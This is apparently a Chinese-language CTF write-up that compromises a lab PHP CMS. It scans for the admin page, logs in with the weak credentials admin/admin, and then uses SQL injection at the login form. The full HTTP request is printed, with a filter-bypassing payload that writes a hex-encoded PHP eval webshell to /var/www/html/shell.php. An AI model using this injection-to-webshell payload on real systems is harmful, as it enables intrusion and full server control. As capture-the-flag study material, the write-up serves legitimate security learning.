http://124.70.71.251:42872/

image.png

题解

扫描后台

image.png
image.png

http://124.70.71.251:42872/admin/login.php

后台使用admin+admin 弱口令进入后台。

image.png

上传处上传图片漏洞。

image.png
image.png

根据网上的漏洞文章可知后台存在上传漏洞,修改为image/png,即可上传PHP的文件,这里修改了提示没有这个功能块。

找了一下文章,发现有有一个漏洞是直接从SQL注入写webshell的。

SQL注入写webshell

注入点在于管理后台登录处。

POST //admin/login.php?action=ck_login HTTP/1.1
Host: 124.70.71.251:42872
Content-Length: 224
Cache-Control: max-age=0
Origin: http://124.70.71.251:42872
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5065.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://124.70.71.251:42872//admin/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=kj295sa9n66i1b2flg4knomrf7
Connection: close

user=user=admin'%20Uni%20union%20on%20seleselectct%201,2,3,4,0x3c3f706870206576616c28245f504f53545b315d293b%20%20in%20into%20dumpfile%20'/var/www/html/shell.php'#&password=123445&code=a99c&submit=true&submit.x=42&submit.y=29

'/var/www/html/shell.php'# #负责这里要注释掉后面的。

image.png

显示不存在该管理用户即成功写入webshell,页面返回用户名错误表示写入成功 访问shell地址:IP+端口+/shell.php

image.png
image.png

在/目录找到key,提交成功~。

参考

https://www.cnblogs.com/yuzly/p/11423384.html

http://www.wangqingzheng.com/anquanke/48/250048.html